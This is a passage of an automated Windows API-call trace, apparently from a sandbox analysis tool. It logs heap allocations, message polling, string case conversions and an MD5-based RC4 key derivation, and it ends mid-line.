[0262.716] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.717] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.717] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.718] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.718] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.718] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.718] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.718] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.718] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.719] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.719] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.719] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.719] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.719] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.719] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.720] CryptHashData (hHash=0xaa59a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.720] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.720] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.721] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.725] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0262.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.727] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 